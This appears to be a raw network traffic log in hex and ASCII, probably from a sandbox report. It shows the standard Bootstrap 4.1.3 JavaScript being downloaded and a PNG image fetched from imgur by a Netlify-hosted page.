2025-01-12 00:32:56 UTC	402	IN	Data Raw: 37 62 65 63 0d 0a 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 31 2e 33 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 Data Ascii: 7bec/! Bootstrap v4.1.3 (https://getbootstrap.com/) * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */!function(
2025-01-12 00:32:56 UTC	1369	IN	Data Raw: 65 66 69 6e 65 28 5b 22 65 78 70 6f 72 74 73 22 2c 22 6a 71 75 65 72 79 22 2c 22 70 6f 70 70 65 72 2e 6a 73 22 5d 2c 65 29 3a 65 28 74 2e 62 6f 6f 74 73 74 72 61 70 3d 7b 7d 2c 74 2e 6a 51 75 65 72 79 2c 74 2e 50 6f 70 70 65 72 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 68 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 69 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 65 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 69 3d 65 5b 6e 5d 3b 69 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 69 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 69 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 69 26 26 28 69 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 Data Ascii: efine(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable\|\|!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.def
2025-01-12 00:32:56 UTC	1369	IN	Data Raw: 6e 2c 50 6e 2c 6a 6e 2c 48 6e 2c 4c 6e 2c 52 6e 2c 78 6e 2c 57 6e 2c 55 6e 2c 71 6e 2c 46 6e 3d 66 75 6e 63 74 69 6f 6e 28 69 29 7b 76 61 72 20 65 3d 22 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 22 3b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 2c 6e 3d 21 31 3b 72 65 74 75 72 6e 20 69 28 74 68 69 73 29 2e 6f 6e 65 28 6c 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 3d 21 30 7d 29 2c 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 7c 7c 6c 2e 74 72 69 67 67 65 72 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 65 29 7d 2c 74 29 2c 74 68 69 73 7d 76 61 72 20 6c 3d 7b 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 3a 22 62 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 22 2c 67 65 74 55 49 Data Ascii: n,Pn,jn,Hn,Ln,Rn,xn,Wn,Un,qn,Fn=function(i){var e="transitionend";function t(t){var e=this,n=!1;return i(this).one(l.TRANSITION_END,function(){n=!0}),setTimeout(function(){n\|\|l.triggerTransitionEnd(e)},t),this}var l={TRANSITION_END:"bsTransitionEnd",getUI
2025-01-12 00:32:56 UTC	1369	IN	Data Raw: 68 61 6e 64 6c 65 72 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 7d 2c 6c 7d 28 65 29 2c 4b 6e 3d 28 6e 3d 22 61 6c 65 72 74 22 2c 61 3d 22 2e 22 2b 28 6f 3d 22 62 73 2e 61 6c 65 72 74 22 29 2c 63 3d 28 72 3d 65 29 2e 66 6e 5b 6e 5d 2c 75 3d 7b 43 4c 4f 53 45 3a 22 63 6c 6f 73 65 22 2b 61 2c 43 4c 4f 53 45 44 3a 22 63 6c 6f 73 65 64 22 2b 61 2c 43 4c 49 43 4b 5f 44 41 54 41 5f 41 50 49 3a 22 63 6c 69 63 6b 22 2b 61 2b 22 2e 64 61 74 61 2d 61 70 69 22 7d 2c 66 3d 22 61 6c 65 72 74 22 2c 64 3d 22 66 61 64 65 22 2c 67 3d 22 73 68 6f 77 22 2c 5f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 69 28 74 29 7b 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 3d 74 7d 76 61 72 20 74 3d 69 2e 70 72 6f 74 6f 74 79 70 65 3b 72 65 74 75 Data Ascii: handler.apply(this,arguments)}},l}(e),Kn=(n="alert",a="."+(o="bs.alert"),c=(r=e).fn[n],u={CLOSE:"close"+a,CLOSED:"closed"+a,CLICK_DATA_API:"click"+a+".data-api"},f="alert",d="fade",g="show",_=function(){function i(t){this._element=t}var t=i.prototype;retu
2025-01-12 00:32:56 UTC	1369	IN	Data Raw: 2c 5f 2e 5f 68 61 6e 64 6c 65 44 69 73 6d 69 73 73 28 6e 65 77 20 5f 29 29 2c 72 2e 66 6e 5b 6e 5d 3d 5f 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2c 72 2e 66 6e 5b 6e 5d 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 5f 2c 72 2e 66 6e 5b 6e 5d 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 2e 66 6e 5b 6e 5d 3d 63 2c 5f 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 7d 2c 5f 29 2c 4d 6e 3d 28 70 3d 22 62 75 74 74 6f 6e 22 2c 79 3d 22 2e 22 2b 28 76 3d 22 62 73 2e 62 75 74 74 6f 6e 22 29 2c 45 3d 22 2e 64 61 74 61 2d 61 70 69 22 2c 43 3d 28 6d 3d 65 29 2e 66 6e 5b 70 5d 2c 54 3d 22 61 63 74 69 76 65 22 2c 62 3d 22 62 74 6e 22 2c 49 3d 27 5b 64 61 74 61 2d 74 6f 67 67 6c 65 5e 3d 22 62 75 74 74 6f 6e 22 5d Data Ascii: ,_._handleDismiss(new _)),r.fn[n]=_._jQueryInterface,r.fn[n].Constructor=_,r.fn[n].noConflict=function(){return r.fn[n]=c,_._jQueryInterface},_),Mn=(p="button",y="."+(v="bs.button"),E=".data-api",C=(m=e).fn[p],T="active",b="btn",I='[data-toggle^="button"]
2025-01-12 00:32:56 UTC	1369	IN	Data Raw: 28 74 29 7b 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 76 61 72 20 65 3d 74 2e 74 61 72 67 65 74 3b 6d 28 65 29 2e 68 61 73 43 6c 61 73 73 28 62 29 7c 7c 28 65 3d 6d 28 65 29 2e 63 6c 6f 73 65 73 74 28 4e 29 29 2c 6b 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2e 63 61 6c 6c 28 6d 28 65 29 2c 22 74 6f 67 67 6c 65 22 29 7d 29 2e 6f 6e 28 4f 2e 46 4f 43 55 53 5f 42 4c 55 52 5f 44 41 54 41 5f 41 50 49 2c 49 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 6d 28 74 2e 74 61 72 67 65 74 29 2e 63 6c 6f 73 65 73 74 28 4e 29 5b 30 5d 3b 6d 28 65 29 2e 74 6f 67 67 6c 65 43 6c 61 73 73 28 53 2c 2f 5e 66 6f 63 75 73 28 69 6e 29 3f 24 2f 2e 74 65 73 74 28 74 2e 74 79 70 65 29 29 7d 29 2c 6d 2e 66 6e 5b 70 5d 3d 6b 2e 5f 6a 51 75 65 72 79 Data Ascii: (t){t.preventDefault();var e=t.target;m(e).hasClass(b)\|\|(e=m(e).closest(N)),k._jQueryInterface.call(m(e),"toggle")}).on(O.FOCUS_BLUR_DATA_API,I,function(t){var e=m(t.target).closest(N)[0];m(e).toggleClass(S,/^focus(in)?$/.test(t.type))}),m.fn[p]=k._jQuery
2025-01-12 00:32:56 UTC	1369	IN	Data Raw: 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 6e 74 29 2c 74 68 69 73 2e 5f 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 28 29 7d 76 61 72 20 74 3d 6f 2e 70 72 6f 74 6f 74 79 70 65 3b 72 65 74 75 72 6e 20 74 2e 6e 65 78 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 69 73 53 6c 69 64 69 6e 67 7c 7c 74 68 69 73 2e 5f 73 6c 69 64 65 28 71 29 7d 2c 74 2e 6e 65 78 74 57 68 65 6e 56 69 73 69 62 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 21 64 6f 63 75 6d 65 6e 74 2e 68 69 64 64 65 6e 26 26 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 69 73 28 22 3a 76 69 73 69 62 6c 65 22 29 26 26 22 68 69 64 64 65 6e 22 21 3d 3d 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 63 73 73 28 22 76 69 73 69 62 69 6c 69 Data Ascii: this._element.querySelector(nt),this._addEventListeners()}var t=o.prototype;return t.next=function(){this._isSliding\|\|this._slide(q)},t.nextWhenVisible=function(){!document.hidden&&P(this._element).is(":visible")&&"hidden"!==P(this._element).css("visibili
2025-01-12 00:32:56 UTC	1369	IN	Data Raw: 67 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 3d 6c 28 7b 7d 2c 57 2c 74 29 2c 46 6e 2e 74 79 70 65 43 68 65 63 6b 43 6f 6e 66 69 67 28 6a 2c 74 2c 55 29 2c 74 7d 2c 74 2e 5f 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 6b 65 79 62 6f 61 72 64 26 26 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 6f 6e 28 51 2e 4b 45 59 44 4f 57 4e 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 65 2e 5f 6b 65 79 64 6f 77 6e 28 74 29 7d 29 2c 22 68 6f 76 65 72 22 3d 3d 3d 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 70 61 75 73 65 26 26 28 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 6f 6e 28 51 2e 4d 4f 55 53 45 45 4e 54 45 Data Ascii: g=function(t){return t=l({},W,t),Fn.typeCheckConfig(j,t,U),t},t._addEventListeners=function(){var e=this;this._config.keyboard&&P(this._element).on(Q.KEYDOWN,function(t){return e._keydown(t)}),"hover"===this._config.pause&&(P(this._element).on(Q.MOUSEENTE
2025-01-12 00:32:56 UTC	1369	IN	Data Raw: 6c 65 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 74 68 69 73 2e 5f 69 6e 64 69 63 61 74 6f 72 73 45 6c 65 6d 65 6e 74 29 7b 76 61 72 20 65 3d 5b 5d 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 74 68 69 73 2e 5f 69 6e 64 69 63 61 74 6f 72 73 45 6c 65 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 24 29 29 3b 50 28 65 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 56 29 3b 76 61 72 20 6e 3d 74 68 69 73 2e 5f 69 6e 64 69 63 61 74 6f 72 73 45 6c 65 6d 65 6e 74 2e 63 68 69 6c 64 72 65 6e 5b 74 68 69 73 2e 5f 67 65 74 49 74 65 6d 49 6e 64 65 78 28 74 29 5d 3b 6e 26 26 50 28 6e 29 2e 61 64 64 43 6c 61 73 73 28 56 29 7d 7d 2c 74 2e 5f 73 6c 69 64 65 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 2c 69 2c 72 2c 6f 3d 74 68 69 73 Data Ascii: lement=function(t){if(this._indicatorsElement){var e=[].slice.call(this._indicatorsElement.querySelectorAll($));P(e).removeClass(V);var n=this._indicatorsElement.children[this._getItemIndex(t)];n&&P(n).addClass(V)}},t._slide=function(t,e){var n,i,r,o=this
2025-01-12 00:32:56 UTC	1369	IN	Data Raw: 29 74 2e 74 6f 28 69 29 3b 65 6c 73 65 20 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 6e 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 74 5b 6e 5d 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 27 4e 6f 20 6d 65 74 68 6f 64 20 6e 61 6d 65 64 20 22 27 2b 6e 2b 27 22 27 29 3b 74 5b 6e 5d 28 29 7d 65 6c 73 65 20 65 2e 69 6e 74 65 72 76 61 6c 26 26 28 74 2e 70 61 75 73 65 28 29 2c 74 2e 63 79 63 6c 65 28 29 29 7d 29 7d 2c 6f 2e 5f 64 61 74 61 41 70 69 43 6c 69 63 6b 48 61 6e 64 6c 65 72 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 46 6e 2e 67 65 74 53 65 6c 65 63 74 6f 72 46 72 6f 6d 45 6c 65 6d 65 6e 74 28 74 68 69 73 29 3b 69 66 28 65 29 7b 76 61 72 20 6e 3d 50 28 65 29 5b 30 5d 3b 69 Data Ascii: )t.to(i);else if("string"==typeof n){if("undefined"==typeof t[n])throw new TypeError('No method named "'+n+'"');t[n]()}else e.interval&&(t.pause(),t.cycle())})},o._dataApiClickHandler=function(t){var e=Fn.getSelectorFromElement(this);if(e){var n=P(e)[0];i

Timestamp	Bytes transferred	Direction	Data
2025-01-12 00:32:56 UTC	600	OUT	GET /g1U1hqo.png HTTP/1.1 Host: i.imgur.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://heuristic-knuth-588d37.netlify.app/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-12 00:32:56 UTC	723	IN	HTTP/1.1 200 OK Connection: close Content-Length: 26887 Content-Type: image/png Last-Modified: Wed, 06 Oct 2021 21:31:16 GMT ETag: "54e862dc5600e9b3c61157ec356738de" X-Amz-Cf-Pop: IAD89-P1 X-Amz-Cf-Id: vcanBOUrc02-P0jW5TaZewPKu-8Kl3TvjlKUxNvSH5plVMtn6CzrmA== cache-control: public, max-age=31536000 Accept-Ranges: bytes Age: 2188846 Date: Sun, 12 Jan 2025 00:32:56 GMT X-Served-By: cache-iad-kiad7000052-IAD, cache-ewr-kewr1740066-EWR X-Cache: Miss from cloudfront, HIT, HIT X-Cache-Hits: 84, 0 X-Timer: S1736641976.169353,VS0,VE1 Strict-Transport-Security: max-age=300 Access-Control-Allow-Methods: GET, OPTIONS Access-Control-Allow-Origin: * Server: cat factory 1.0 X-Content-Type-Options: nosniff
2025-01-12 00:32:56 UTC	1371	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 44 00 00 02 54 08 02 00 00 00 52 6f bb 15 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 68 b1 49 44 41 54 78 5e ed dd 09 9c 1c 75 9d ff ff ea 6b ee fb ce 35 93 53 48 c8 45 88 81 09 08 26 90 98 a0 a2 80 1c 12 f0 5a 75 d9 f5 f7 53 97 75 17 1f 82 fe f9 29 f8 d3 5d 65 5d f7 c7 fe 58 fd 2d 0b 4a 90 33 0a 2b 87 09 04 c2 91 c1 98 84 dc 21 e4 62 72 cd 7d df d3 47 fd 3f 55 f5 ed 9e 9e 99 ee 9e 99 9e 99 24 35 fd 7a da 36 55 df aa ae 6b 66 2a fd ae ef b7 be e5 d0 75 5d 03 00 00 00 00 00 f6 e1 54 ff 05 00 00 00 00 00 36 41 98 07 00 00 00 00 c0 66 08 f3 00 00 00 00 00 d8 0c 61 1e 00 00 00 00 00 9b 21 cc 03 00 00 00 00 60 33 84 79 00 00 00 00 00 6c 86 30 0f 00 00 00 Data Ascii: PNGIHDRDTRosRGBgAMAahIDATx^uk5SHE&ZuSu)]e]X-J3+!br}G?U$5z6Ukf*u]T6Afa!`3yl0
2025-01-12 00:32:56 UTC	1371	IN	Data Raw: 00 b0 19 c2 3c 00 00 00 00 00 36 43 98 07 00 00 00 00 c0 66 08 f3 00 00 00 00 00 d8 0c 61 1e 00 00 00 00 00 9b 21 cc 03 00 00 00 00 60 33 84 79 00 00 00 00 00 6c 86 30 0f 00 00 00 00 80 cd 10 e6 01 00 00 00 00 b0 19 c2 3c 00 00 00 00 00 36 43 98 07 00 00 00 00 c0 66 08 f3 00 00 00 00 00 d8 0c 61 1e 00 00 00 00 00 9b 21 cc 03 00 00 00 00 60 33 84 79 00 00 00 00 00 6c 86 30 0f 00 00 00 00 80 cd 10 e6 01 00 00 00 00 b0 19 c2 3c 00 00 00 00 00 36 43 98 07 00 00 00 00 c0 66 08 f3 00 00 00 00 00 d8 0c 61 1e 00 00 00 00 00 9b 21 cc 03 00 00 00 00 60 33 84 79 00 00 00 00 00 6c 86 30 0f 00 00 00 00 80 cd 10 e6 01 00 00 00 00 b0 19 c2 3c 00 00 00 00 00 36 43 98 07 00 00 00 00 c0 66 08 f3 00 00 00 00 00 d8 0c 61 1e 00 00 00 00 00 9b 21 cc 03 00 00 00 00 60 33 84 79 Data Ascii: <6Cfa!`3yl0<6Cfa!`3yl0<6Cfa!`3yl0<6Cfa!`3y
2025-01-12 00:32:56 UTC	1371	IN	Data Raw: 76 ba 2f cf bc a0 2c b9 50 8d 47 21 1f 3b d5 db b4 b5 ed 03 df 30 f6 5a 66 ae ea 6d 7e ab ed 50 ec ba 68 a7 c3 59 e4 c9 2a cf 9c 93 eb 4e 1b 7e bf 7a b6 23 c7 bc d9 df f9 87 c6 ed 3f 3b f3 c7 16 7f 97 2a 05 00 e0 3c 46 98 07 00 4c 34 01 4d ef 0a f4 3c 5a fb 86 c4 5a 49 c8 c3 ab a6 1e 33 b2 ba a3 dd 35 ef b6 1d 96 55 ab a2 e1 09 e8 fa a1 ae aa bd 1d 46 9f 79 03 b6 d9 e5 70 5e 9c 3e fd c2 d4 c9 49 0e 77 8c 44 2d 9f ea 09 78 ff bb 69 a7 2f 66 65 bb 45 d7 f5 37 5a 0f d4 7a 5b 63 df 63 ef d4 1c 53 93 f2 56 64 cd 73 4a ae 57 65 13 90 1c 02 bf 1e 68 f6 77 3c df b4 63 43 e3 36 b3 4d c7 59 fd b5 01 00 60 a4 08 f3 00 80 09 48 72 58 93 bf f3 87 a7 36 9c ec 69 30 9f 24 7f 96 48 02 ec 0d f8 f6 77 9e da dd 51 39 d2 bb af e5 b3 f2 11 09 d8 a7 8c 3b b7 fb 6d b2 04 f8 64 Data Ascii: v/,PG!;0Zfm~PhYN~z#?;<FL4M<ZZI35UFyp^>IwD-xi/feE7Zz[ccSVdsJWehw<cC6MY`HrX6i0$HwQ9;md
2025-01-12 00:32:56 UTC	1371	IN	Data Raw: d5 6d d9 d7 79 72 cc 53 a2 45 16 7b ac a7 e6 cd d6 83 b1 97 3f 3b a5 f8 a6 fc 4b 17 a5 97 a5 3a 93 a3 35 f6 96 cf 77 f8 7b 7e 5b ff d6 e0 9a 73 a7 c3 91 ed 4e bb 25 7f 79 ec 30 2f 1f 3c d2 5d b3 a7 b3 d2 3b a8 b3 7a 9f 16 38 d0 75 6a 5f 57 ac e3 20 8b 76 3b 9c 57 64 5e 20 5b 6b 36 e9 8f 93 5f d7 65 03 ba 03 de 8e 40 cf f0 5f 9d 81 9e ee 40 af a4 7a b5 94 31 25 c7 3c c7 95 ae 46 62 89 d9 68 01 00 80 f3 00 61 1e 00 90 10 7a 03 be 37 5b df 7f b2 61 6b b3 af 73 cc 83 a2 04 3f bf a6 af af 7f 47 b2 68 b4 14 28 31 52 12 f2 85 a9 93 2f c9 98 b9 3c 73 ce e4 a4 9c 68 cd d7 25 66 fb 75 ff 7f 37 ee a8 f7 b5 0e da 54 87 c7 e1 bc ad 60 79 9a 2b 39 46 9e 0f 68 7a bb bf 7b 77 c7 09 eb 31 fb aa d4 d4 15 e8 dd db 71 e2 78 77 ad 1a 8f cc 78 a4 dc ad f9 cb 3d 0e 57 b4 2b 0e Data Ascii: myrSE{?;K:5w{~[sN%y0/<];z8uj_W v;Wd^ [k6_e@_@z1%<Fbhaz7[aks?Gh(1R/<sh%fu7T`y+9Fhz{w1qxwx=W+
2025-01-12 00:32:56 UTC	1371	IN	Data Raw: 81 4d 4e ca fd 4a e1 55 0b d3 4a cd 56 e8 11 58 6d ce ab bd cd 46 47 6b aa 2c 4e 7e 2d b0 a5 f5 c0 a9 de c6 18 8b 92 58 28 d9 f8 53 b9 4b 24 81 87 b6 47 0a 4b 93 f2 3f 96 79 a1 23 e6 bf c5 cd fe ce 0a e3 be f7 66 35 1e a6 d0 93 29 1f 1f b2 35 b8 55 1b ef d5 fd 6d fe ae 3f b5 ec f1 45 bf 17 40 b6 4d b6 f0 d2 8c d9 1f 49 2d 19 c3 36 f6 b2 d8 91 bf 62 dc 3d 30 2e 64 6d b2 ef d9 ae d4 9b f3 2f 5b 93 b3 68 94 cf e4 03 00 e0 2c 20 cc 03 00 26 1a b7 e6 5c 98 5e f6 85 a2 2b a7 24 e5 8d b2 3f f6 21 b5 f8 3b 5f 6f d9 df e8 6b 57 e3 91 48 4a 9c 97 3a 75 51 7a 59 78 65 af 0c 25 3b 3d 37 17 5c 16 a3 66 5e 48 08 3f d0 75 7a 7b c7 31 35 1e 26 c9 e1 5e 90 36 6d 61 5a a9 1a 8f 4c ef f4 f7 be d8 f4 5e 57 a0 f7 ad b6 f7 ab 7a 9b 63 dc 58 20 c7 6a 6a 72 fe 92 f4 19 39 ae f4 Data Ascii: MNJUJVXmFGk,N~-X(SK$GK?y#f5)5Um?E@MI-6b=0.dm/[h, &\^+$?!;_okWHJ:uQzYxe%;=7\f^H?uz{15&^6maZL^WzcX jjr9
2025-01-12 00:32:56 UTC	1371	IN	Data Raw: cf e8 1e 3f 96 1a 6f cb 3b ed 1f bc d8 fc de 7f 37 ed 1c fe eb 8f 4d ef e5 ba d2 66 a5 14 4b 38 b7 76 55 92 f6 b1 9e da 4d 2d 7b 1b a2 3f 05 50 c2 bc db e1 5c 9b 73 f1 c7 b3 e7 e6 ba 33 32 5d a9 f2 fb 30 35 39 af b2 a7 fe 70 77 75 b4 4b 03 b2 7c f9 ad 38 d4 5d b5 28 bd 6c 4a 52 ee d9 7f 2a 1e 00 00 f1 a1 66 1e 00 30 c1 39 35 47 86 2b f5 13 d9 0b 3f 97 77 a9 47 1b 56 58 8d 4d d7 75 c9 a8 5b 5a 0f 76 05 62 75 29 37 d6 f4 9d 1d 1f 1e e8 3a 3d b8 2d 80 44 cf 8f 65 5e 30 3d b9 d0 15 d7 3f eb 92 5d 33 5c 29 9f c9 5d 9a e4 18 b3 ae ef 2c 7e 3d f0 61 4f dd 5b ad ef 6f 6e d9 3f d2 d7 89 de 06 9f 44 f8 91 1f 5e c9 e2 c6 c3 ed cd 97 c7 e1 9a 95 5c 7c 5b e1 e5 03 ae ef 84 93 15 f8 74 ff 89 9e fa 1f 9c 7c fa 74 6f 63 80 c7 fc 00 00 6c 82 30 0f 00 98 f8 24 ee 96 24 e5 Data Ascii: ?o;7MfK8vUM-{?P\s32]059pwuK\|8](lJR*f095G+?wGVXMu[Zvbu)7:=-De^0=?]3\)],~=aO[on?D^\\|[t\|tocl0$$
2025-01-12 00:32:56 UTC	1371	IN	Data Raw: a8 2b be 31 21 db f6 3f 4b d6 5c 9f f7 d1 14 67 92 95 cb 7d e6 1a ff a5 fa a5 93 3d 0d 66 41 64 1e 87 4b 7e 58 f2 c1 68 cf cc 97 c3 d2 e8 6b 7f b8 e6 d5 97 9a de 8b 7d 88 d2 9c 49 6b 72 16 7f b5 68 45 5e cc 67 da 01 00 70 ae 10 e6 01 00 36 20 b9 eb 44 4f 7d 77 c0 ab c6 a3 48 72 ba 0b dd 99 e9 c3 78 42 9b 44 d0 5e dd 7f ba a7 d1 ab fb 62 fc 43 e8 74 38 32 5d a9 05 ee 4c 49 89 32 da ab fb 2a 7b ea 25 ca 5a 53 a3 91 99 25 01 66 bb 53 9d 23 69 01 67 6d 52 ad b7 a5 c3 3f f0 49 f2 03 c8 56 e5 ba d2 65 15 83 43 b8 6c 5b 83 af ad d9 df 19 18 c6 bf ef 19 ae e4 22 4f b6 6c ad 63 a8 c3 35 80 fc 38 3a fc dd d5 de 96 21 0f 45 dc 8a 3c 59 39 ae f4 50 7b 78 59 63 a7 bf a7 ce d7 d6 13 f3 77 c0 e5 70 e4 bb 33 73 5c 69 ce e8 97 27 64 9b 9b fd 1d 0d be f6 d8 87 48 56 9c ea Data Ascii: +1!?K\g}=fAdK~Xhk}IkrhE^gp6 DO}wHrxBD^bCt82]LI2*{%ZS%fS#igmR?IVeCl["Olc58:!E<Y9P{xYcwp3s\i'dHV
2025-01-12 00:32:56 UTC	1371	IN	Data Raw: 00 36 43 98 07 80 71 11 d0 03 5e dd df ab fb 86 f3 f2 eb 01 f5 31 c0 ce 74 5d 0f 98 fc e6 cb 22 85 e1 53 ad 49 a1 19 42 53 01 00 c0 88 38 f8 47 14 40 02 aa a8 a8 28 2f 2f 57 23 63 4d 92 79 bd af ed 68 4f cd 99 9e 26 bf 36 74 4a 77 69 ce 49 49 b9 b3 52 8a f2 dd 99 1e 87 4b 95 02 a3 23 ff be 9f 39 73 c6 eb f3 15 17 97 38 9d e3 7e ed 5e 56 e7 f7 fb 1b 1a 9b 1a 9b 9a 24 a2 ab 52 4d 93 55 17 e4 e7 e7 e7 e5 ca 0c 32 b5 a1 b1 71 c0 d4 bc dc 5c 79 b9 dd 2e 87 c3 a1 4a 81 91 a8 ab ad 99 3a 75 aa 1a 01 80 44 42 98 07 90 88 c6 35 cc d7 f9 5a ff f7 a9 e7 5f 6e de 95 e5 4a 75 68 c6 ff 62 93 f3 70 bb bf e7 ea 9c f9 df 9d 7c dd e4 a4 5c 55 0a 8c ce 59 0e f3 12 d1 6b 6a eb fe f0 c7 97 03 fe 80 db ed 56 bf f6 ba e6 f5 7a 65 ed eb 6e b9 51 66 58 ff d4 73 52 e6 49 f2 98 d3 Data Ascii: 6Cq^1t]"SIBS8G@(//W#cMyhO&6tJwiIIRK#9s8~^V$RMU2q\y.J:uDB5Z_nJuhbp\|\UYkjVzenQfXsRI
2025-01-12 00:32:56 UTC	1371	IN	Data Raw: 97 d3 bf 58 96 5c 20 49 25 a0 99 2f 3d 50 eb 6d fd e7 33 7f fc ee 89 df b5 fa bb a4 64 04 55 95 53 57 de 78 93 b6 e1 b6 49 fd d3 69 44 56 54 be 5f 35 c8 af d0 96 97 df ab a6 98 64 21 9b 57 59 d3 b6 de af dd bb 7c e8 05 8a 7b 97 df a5 3d 64 7e a6 ea 89 1b 64 09 61 49 d8 52 be f2 87 92 83 82 17 1b 4e 6d 7e ee 19 f9 cf ce e3 2a e8 56 6f fe fd 06 ed 87 2b 83 cd 0a 8c 36 fc 5b 65 fe 9b d6 57 05 2f 46 18 ab 78 70 86 8c 1a 2a ee 8f b4 8a 61 91 f0 dc b7 ef 7a d5 7a 6d dd 24 15 95 25 6c 4f 5a a7 19 6b 34 54 dc 7f 6f 79 78 9e d7 ee bd ed b9 1b 4f 9a 93 be bf d4 18 ff c1 f2 6f 04 f7 78 fd 4d 1b d6 4d 53 51 5c 42 78 f8 cd 0e 5b 7f d8 37 49 6c b8 6d f9 f1 bb cc 09 27 d7 df 60 5e aa f8 d9 6c 6b 85 b2 90 be 43 2d 1b 39 e9 